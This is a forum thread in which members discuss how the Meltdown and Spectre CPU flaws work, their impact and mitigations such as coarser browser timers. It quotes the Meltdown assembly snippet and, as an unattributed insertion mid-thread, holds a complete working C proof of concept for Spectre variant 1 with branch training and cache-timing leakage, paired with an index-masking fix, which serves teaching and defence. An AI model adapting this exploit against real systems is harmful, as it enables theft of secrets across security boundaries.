Intel Spectre bug?


Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm

Intel Spectre bug?

Post by Dwedit »

Does anyone understand how this works? I understand Meltdown fine, but I have no idea what Spectre is supposed to be. Can anyone explain it?
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!
Bregalad
Posts: 8056
Joined: Fri Nov 12, 2004 2:49 pm
Location: Divonne-les-bains, France

Re: Intel Spectre bug?

Post by Bregalad »

To be honest I didn't understand either bug, despite throwing a few hours at them. My understanding is that they exploit/abuse how branch prediction works and can retrieve data they should not be able to by doing an "if ()" reading illegal memory, and measuring the time it takes until the exception pops up. The bug is inherent to the hardware, so the only way to not have it would be to discard branch prediction or not have a reliable timer.

Now, how could nobody think about this between 1995 and 2017, and then wait six more months before publishing it in January 2018? I really wonder, even though personally I wouldn't have thought of it.
Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm

Re: Intel Spectre bug?

Post by Dwedit »

Meltdown makes perfect sense. The code snippet from the pdf is very easy to follow:

 ; rcx = kernel address
 ; rbx = probe array (256 slots, one per 4 KiB page, all flushed from cache beforehand)
retry:
 mov al, byte [rcx]            ; load the secret byte; this will fault, but executes transiently first
 shl rax, 0xc                  ; multiply by 4096 to select one page of the probe array
 jz retry                      ; a zero would land on page 0, which is noisy, so try again
 mov rbx, qword [rbx + rax]    ; touch the selected page so it becomes cached; reload timing later reveals al

The byte fetch will trigger an exception, but due to the flaw, it has already gone ahead and done the read into the probe array, so it is now cached. Even though the values are discarded, they were still used.

I saw the Youtube video demonstrating dumping kernel memory, so you can see that it clearly works.

Meltdown is easy to follow since it's in the same address space as the process. But Spectre remains a mystery to me.
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada

Re: Intel Spectre bug?

Post by rainwarrior »

I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Spectre on the other hand seems to be a new area of vulnerability for exploiting existing programs. Like how an unchecked array bound in a program might leave you with a way to exploit it, now that we're aware of ways to manipulate and time branch prediction via the cache, a checked bound is vulnerable too if you can get it to mispredict the branch and do the array access anyway.

Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

At least, that's the gist of what I got from this whitepaper:
https://spectreattack.com/spectre.pdf
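The two mechanisms discussed above fit together in one small program. What follows is an added example, not code from this thread or from the Meltdown/Spectre papers: the probe-array cache channel that Dwedit's Meltdown snippet relies on (flush 256 page-strided lines, let a transient access touch one of them, then time a reload of each line), driven here by a Spectre variant 1 gadget of the kind rainwarrior describes (a correctly bounds-checked array read whose branch is trained to mispredict), next to a hardened version of the same gadget that masks the index without a branch. The secret string, the 80-cycle hit/miss threshold, the round counts and the function names are all assumptions; the code is x86-64 only because it uses clflush and rdtscp, and the leaked output will vary from machine to machine.

```c
/* Added example (not from the thread): Flush+Reload probe array + Spectre v1 gadget,
 * plus the same gadget hardened with a branchless index mask. x86-64 only.
 * Secret, threshold and round counts are assumptions; calibrate THRESHOLD per CPU.
 * Build and run: gcc -O1 -o spectre_demo spectre_demo.c && ./spectre_demo */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define STRIDE    4096  /* one page per probe line so the prefetcher cannot blur them */
#define THRESHOLD 80    /* cycles separating an L1 hit from a DRAM miss (assumed) */
#define ROUNDS    200

static uint8_t probe[256 * STRIDE];
static uint8_t public_array[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static size_t  public_len = 16;
static const char secret[] = "Squeamish Ossifrage";  /* constructed in-process secret */
static uint8_t sink;  /* keeps the probe access from being optimised away */

/* Victim gadget: correctly bounds checked, yet when the branch mispredicts the
 * out-of-bounds read and the dependent probe access still run speculatively. */
__attribute__((noinline)) static void victim(size_t idx)
{
    if (idx < public_len)
        sink &= probe[public_array[idx] * STRIDE];
}

/* All ones when idx < len, zero otherwise, with no branch for the predictor
 * to mispredict (the Linux array_index_mask_nospec idiom). */
static inline size_t index_mask(size_t idx, size_t len)
{
    return (size_t)(~(intptr_t)(idx | (len - 1 - idx)) >> (sizeof(size_t) * 8 - 1));
}

/* Hardened gadget: the index is clamped to 0 on the speculative path as well. */
__attribute__((noinline)) static void victim_hardened(size_t idx)
{
    if (idx < public_len) {
        idx &= index_mask(idx, public_len);
        sink &= probe[public_array[idx] * STRIDE];
    }
}

static void flush_probe(void)
{
    for (int i = 0; i < 256; i++) _mm_clflush(&probe[i * STRIDE]);
}

static uint64_t time_access(const volatile uint8_t *p)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

/* The probe line that was hot most often across all rounds, or -1 if none was. */
static int best_line(const int hits[256])
{
    int best = -1, max = 0;
    for (int i = 0; i < 256; i++)
        if (hits[i] > max) { max = hits[i]; best = i; }
    return best;
}

/* Train the gadget's branch in bounds, call it once out of bounds, then reload
 * every probe line: the one the speculative access pulled in is the leaked byte. */
static int leak_byte(void (*gadget)(size_t), size_t malicious_idx)
{
    int hits[256] = {0};
    const size_t  training_idx = 0;
    const uint8_t training_val = public_array[training_idx];
    for (int r = 0; r < ROUNDS; r++) {
        flush_probe();
        for (int j = 9; j >= 0; j--) {
            _mm_clflush(&public_len);  /* slow bounds check = long speculation window */
            for (volatile int z = 0; z < 100; z++) { }
            /* j % 6 == 0 selects malicious_idx, else training_idx, computed
             * arithmetically so the attacker adds no branch of its own to train. */
            size_t x = (size_t)((j % 6) - 1) & ~(size_t)0xFFFF;
            x |= x >> 16;
            gadget(training_idx ^ (x & (malicious_idx ^ training_idx)));
        }
        for (int k = 0; k < 256; k++) {
            int i = ((k * 167) + 13) & 255;  /* scrambled order defeats stride prefetch */
            if (time_access(&probe[i * STRIDE]) <= THRESHOLD && i != training_val)
                hits[i]++;
        }
    }
    return best_line(hits);
}

static void dump(const char *label, void (*gadget)(size_t), size_t off)
{
    printf("%s", label);
    for (size_t i = 0; i + 1 < sizeof secret; i++) {
        int b = leak_byte(gadget, off + i);
        putchar(b > 0 ? b : '?');
    }
    putchar('\n');
}

int main(void)
{
    for (size_t i = 0; i < sizeof probe; i += STRIDE) probe[i] = 1;  /* back the pages */
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)public_array);  /* index reaching the secret */
    dump("vulnerable gadget: ", victim, off);
    dump("hardened gadget:   ", victim_hardened, off);
    return 0;
}
```

The attacker never reads `secret` architecturally: `victim` only ever executes the array access on the mispredicted path, and the byte comes back purely through which probe page reloads fast. `victim_hardened` keeps the same `if`, but `index_mask` forces a bad index to 0 even while the branch is being speculated past, so the transient read can only touch `public_array[0]` and the leak prints `?` for every byte. An `lfence` after the bounds check is the heavier alternative to the mask. The Meltdown snippet above differs only in where the transient out-of-bounds load comes from (a faulting kernel read rather than a mispredicted branch); the probe-array half is the same.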
Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm

Re: Intel Spectre bug?

Post by Dwedit »

So spectre basically requires scripting or other ways of executing code within another process? Got it.

Seems like it would be useful for exploiting web browsers to find out the address layout before going to ROP.
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both flaws require the ability to run arbitrary but jailed code on the target CPU.

Both flaws involve the same ultimate failure: reading memory that you're "supposed" to not be able to. Meltdown's "just" the version that compromises the read protection guarantees made by the page table.
pubby
Posts: 583
Joined: Thu Mar 31, 2016 11:15 am

Re: Intel Spectre bug?

Post by pubby »

Dwedit wrote:So spectre basically requires scripting or other ways of executing code within another process? Got it.
It's less restrictive than that. If you have a sequence of bytes you want to run and that sequence of bytes happens to exist in the program's address space, you can train the branch predictor from outside the program to jump there and execute it speculatively. And since speculative execution touches the cache, it can be used to leak information.
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada

Re: Intel Spectre bug?

Post by rainwarrior »

The prognosis I've understood is that Meltdown can be corrected by having the OS take protective measures with its kernel paging, at some performance cost. Spectre is more insidious, since it operates from within a program in its own space, and exploits very normal and extremely common code (e.g. jump tables, bounded array lookups, etc.). Not something that can really be patched directly, or that most software developers could even try to prevent, but probably browsers and other critical stuff can be vigilant in addressing known attacks as they appear. A hydra monster always growing new heads.

I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

(Also, the Spectre attacks work on most CPUs, not just Intel design?)
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

Meltdown, for whatever it's worth, doesn't only affect Intel's CPUs. It's just that Intel was the only corporation to consistently put the permissions check on the wrong (i.e. higher performance) side of the L1 cache fetch. But there's a reason why the newest highest-performing ARM cores are also vulnerable. I think I remember reading it being true of several markedly older POWER cores, too.

There's a fascinating article that came up in the wake of these revelations about the PowerPC core in the Xbox 360 and its cache-coherency-violating XDCBT instruction.
Bregalad
Posts: 8056
Joined: Fri Nov 12, 2004 2:49 pm
Location: Divonne-les-bains, France

Re: Intel Spectre bug?

Post by Bregalad »

rainwarrior wrote:I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.
Also my understanding is that Spectre is more like a family of possible exploits, while Meltdown is a particular implementation of such an exploit that actually works. I might be wrong.
rainwarrior wrote:Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.
So in my understanding, for Spectre to work you need a very specific CPU *and* a very specific version of a very specific program; with programs constantly updating every week, the exploit has to be updated as well to take account of new low-level code. Also it only allows spying on data on one person's computer, which is indeed problematic, but Google already does that for everyone using Chrome or any Google-related website, so it's nothing new. It doesn't allow writing to memory so as to actually implement malware.
lidnariq wrote:Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.
My understanding is that you access data not by reading it directly, but by measuring the time it takes to read it and seeing whether it was a cache hit or miss, so data is "read" one bit at a time, and some kind of timer is probably used to measure this time. If the timer is made inaccurate enough that it can't accurately distinguish between a cache hit and a cache miss, then data can't be retrieved accurately and the exploit is impossible, even if speculative execution is still enabled. Even in the current state I think there are some bits which are sometimes read wrongly, as I have seen a video drawing a cat picture with Spectre, and there was some random noise on the picture. So just making the timer inaccurate might solve the issue.
rainwarrior wrote:I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P
Or AMD ;P

(By the way, Intel Itanium processors seem to be unaffected because they lack hardware speculative execution, which is mostly done at compile time)
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada

Re: Intel Spectre bug?

Post by rainwarrior »

It doesn't need to be quite that specific, I don't think. Your exploiting program can actually search for the needed code fragments to exploit (and you can even use stuff in shared DLLs). I think you need to know something about the program to find an opening in the first place, but I think it'd be tough to sanitize a big API like javascript. There's probably clever ways to prevent a lot of it, but it seems like there are a lot of open holes.

As for timers, you can always repeat the tests to get around timer accuracy. It doesn't close the hole, just reduces bandwidth? That might actually be one of the things browsers have currently disabled in response, though there might be multiple ways to create effective timers?

Edit: Yes, it looks like exactly that was done. https://blog.mozilla.org/security/2018/ ... ng-attack/

Then again, I'm surprised that I haven't yet seen news of this thing in action. Just research demos. Where's the Spectre supervirus? Maybe we're lucky and it's too hard to use effectively?
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both Spectre and Meltdown are "only" (n.b. scare quotes; I don't mean to imply this isn't a serious problem) useful for exfiltration. Meltdown lets you bypass kASLR ... if you have an attack that would have been hampered by having to find entry points. Spectre lets you use javascript to read sensitive data out of another web browser tab ... if the attackee has sensitive data to read.

Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack. It just makes that attack easier.
tepples
Posts: 22708
Joined: Sun Sep 19, 2004 11:12 pm
Location: NE Indiana, USA (NTSC)

Re: Intel Spectre bug?

Post by tepples »

lidnariq wrote:Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack.
Your password manager, your cryptocurrency wallets, and your PGP and SSH private keys, for a start. Someone who can SSH in can install ransomware.
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada

Re: Intel Spectre bug?

Post by rainwarrior »

Seeing news today about bitcoin miners slipping into YouTube ads doesn't fill me with hope. :(
https://arstechnica.com/information-tec ... cy-miners/

Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.
Revenant
Posts: 462
Joined: Sat Apr 25, 2015 1:47 pm
Location: FL

Re: Intel Spectre bug?

Post by Revenant »

rainwarrior wrote:Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.
And this is exactly why ad blockers are such a valuable anti-malware tool.